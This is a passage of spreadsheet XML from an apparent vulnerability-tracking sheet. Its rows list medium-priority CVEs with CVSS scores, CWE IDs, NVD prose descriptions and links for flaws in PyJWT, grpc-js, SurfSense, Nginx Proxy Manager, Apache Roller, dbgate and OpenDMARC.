          <t>@grpc/grpc-js implements the core functionality of gRPC purely in JavaScript, without a C++ addon. Prior to 1.13.6 and 1.14.5, getAuthContext does not distinguish authorized from unauthorized peer certificates when server credentials set requireClientCertificate to false. When applications use the returned authentication context, they can treat an unauthorized certificate as authorized, causing improper authentication. @grpc/grpc-js-xds can reach this condition when RBAC authentication is enabled in affected configurations. This issue is fixed in version 1.14.5 and 1.13.6.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101916</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102243</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in MODSetter SurfSense up to 2.0.3. This issue affects some unknown processing of the file /api/search-source/connectors/mcp/test of the component MCP Connector Integration. Such manipulation leads to command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102243</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102266</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>python, go, rust</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, HMACAlgorithm.from_jwk is affected because PyJWK verification path used the decoded key without applying prepare_key validation. This occurs when a trusted JWK Set contains an oct entry with an empty k value. As a result, an attacker signs an HMAC token with the same zero-length key accepted by PyJWT. Consequently, forged token can carry arbitrary authenticated claims. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102266</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102267</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>python, rust</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-345, CWE-918</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT PyJWKClient is affected because redirect destinations are not revalidated against the JWKS trust boundary. This occurs when a configured trusted JWKS endpoint returns an attacker-influenced redirect. As a result, PyJWKClient follows the redirect and consumes the redirected response as key material. Consequently, forwarded credentials may be disclosed or verification keys may be substituted. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102267</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102271</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.4.0 until 2.14.0, PyJWT HMACAlgorithm.prepare_key is affected because asymmetric-key guard relies on textual markers that are absent from DER encoding. This occurs when an application mixes HMAC and asymmetric algorithms and supplies a DER public key as the shared verification key. As a result, PyJWT uses public DER bytes as an HMAC secret. Consequently, an attacker who knows the public key can forge authenticated HMAC tokens. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102271</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102272</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, HMACAlgorithm.prepare_key in jwt/algorithms.py is affected because raw-JWK detector does not normalize accepted Unicode byte-order marks before checking for JSON. This occurs when a public JWK is prefixed with a UTF-8 BOM and used in a mixed-algorithm verification path. As a result, public JWK bypasses asymmetric-key detection and becomes the HMAC secret. Consequently, an attacker who knows the public key can forge authenticated tokens. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102272</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102273</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, PyJWT HMACAlgorithm.prepare_key is affected because HMAC key guard only recognizes top-level public JWK forms and misses container representations. This occurs when an application allows HMAC and asymmetric algorithms and passes a public JWK container as the raw key. As a result, public asymmetric key material is accepted as the HMAC secret. Consequently, an attacker who knows the public key can forge a token with arbitrary authenticated claims. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102273</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102334</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>nginx, gin</t>
        </is>
      </c>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>Nginx Proxy Manager through 2.16.0 lacks rate-limiting on authentication endpoints, allowing unauthenticated attackers to make unlimited password guesses against any account. Attackers can brute-force login credentials via POST /api/tokens and subsequently guess TOTP codes via POST /api/tokens/2fa to gain full session access and administrative control.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102334</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82375</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>Server-Side Request Forgery (SSRF) in Apache Roller 6.1.5 allows an authenticated user with entry-editing rights on a weblog to cause outbound HTTP requests to attacker-chosen destinations through legacy outbound Trackback and entry enclosure handling. The Trackback control is hidden in the standard UI, but its action remains directly reachable; the enclosure path is relevant only when an author supplies an enclosure URL. No non-default server configuration is required, and the default empty Trackback allow-list permits all destinations. Requests can reach loopback and private-network addresses, while enclosure handling exposes response status, content type, and length. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which removes the outbound trackback action and stops dereferencing enclosure URLs.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82375</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101012</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This impacts an unknown function of the file makeresult.php. This manipulation of the argument makeid causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101012</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101015</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-1289, CWE-20</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this issue is some unknown functionality of the file policy.c of the component Domain Handler. Executing a manipulation can lead to improper validation of unsafe equivalence in input. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101015</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101066</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in dbgate up to 7.3.1. The impacted element is the function createLink of the file packages/api/src/controllers/archive.js of the component Archive Link Creation. This manipulation of the argument linkedFolder causes path traversal. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101066</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101067</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in dbgate up to 6.8.1/7.0.2/7.1.8/7.2.5/7.3.1. This affects the function saveUploadedFile of the file files.js of the component save-uploaded-file Endpoint. Such manipulation of the argument filePath/fileName leads to path traversal. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101067</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101280</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-290</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Trusted Domain Project OpenDMARC up to 1.4.2. Affected is the function opendmarc_policy_query_dmarc of the component Multi-Record Set Handler. The manipulation results in authentication bypass by spoofing. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101280</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101281</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this vulnerability is the function opendmarc_sp2_find_mailfrom_domain of the file libopendmarc/opendmarc_spf.c of the component SPF Macro Handler. This manipulation causes improper authentication. The attack is possible to be carried out remotely. The exploit has been published and may be used. Patch name: c48a74c758677fc5272a73eff15ffdbf8afda1a6. Applying a patch is the recommended action to fix this issue.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101281</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102245</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in MODSetter SurfSense up to 2.0.3. The affected element is an unknown function of the file surfsense_backend/app/routes/circleback_webhook_route.py of the component circleback Endpoint. Executing a manipulation can lead to missing authentication. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
